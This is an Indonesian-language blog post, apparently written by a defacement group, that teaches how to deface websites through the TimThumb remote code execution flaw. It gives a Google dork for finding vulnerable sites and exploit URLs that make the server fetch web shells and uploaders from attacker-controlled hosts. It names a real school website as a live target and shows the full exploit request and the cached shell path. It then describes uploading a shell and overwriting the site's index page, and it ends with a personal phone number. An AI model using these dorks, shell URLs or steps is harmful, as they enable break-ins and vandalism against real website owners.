Deface Timthumb RCE

DEFACE TIMTHUMB RCE



Kuy Kali Ini Kita Bahas Deface Dengan Metode Timthumb RCE
Pertama" Siapkan Dorknya Ama Exploitnya .. (Exploitnya Beda Beda Gan.. Kita Tinggal Liat
Versinya dolo ea:<)..

- Drok : inurl:timthumb.php?src= (selebihnya kembangin yah)

- Exploit :
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php (uploader versi 1.9)
?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php (private shell versi 1.30)
?scr=http://flickr.com.x-groups.org/Nur.php (versi 1.20 kebawah)
Sudah diuji coba oleh android by Nurmala And W3LL SQUAD Passnya 22 ok :)

Live Target :
http://mamnonsunrise.edu.vn
Pertama Kita Dork Dulu Digoogle Dulu :(


Berhubung Gw Udh Ada Targetnya Langsung Aja Gan Kita Sikat:(..



Lah Keluar Versinya Kan?? Kuy Tinggal Tambahkan Exploit 1.30
http://mamnonsunrise.edu.vn/timthumb.php?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php

Kemudian Kita Copy Mulai Dari ./cache sampek php contohnya :
http://mamnonsunrise.edu.vn/cache/external_766fc9ebc1c710f9dda399c2256bea00.php
Kemudian Pasti Akan Ada Tempat Upload File


Pilih Shell Kalian Dan Bummmmmmmm:*


Kemudian Cari Index.html Atau Index.php... Trs kalian Edit Dan Tumpuk Dengan Script Deface
kalian.. Dan Otomatis web sudah ketebas:v... Kalau kalian Baik Jangan lupa Backup Dulu indexnya,, Kasian Adminnya Vvq:v,,,,



OK SAMPEK SINI DULU YA,, LAW KNGN LNGSNG CHAT GW AJA 083831973261,, HWHWHW;V










Tidak ada komentar:

Posting Komentar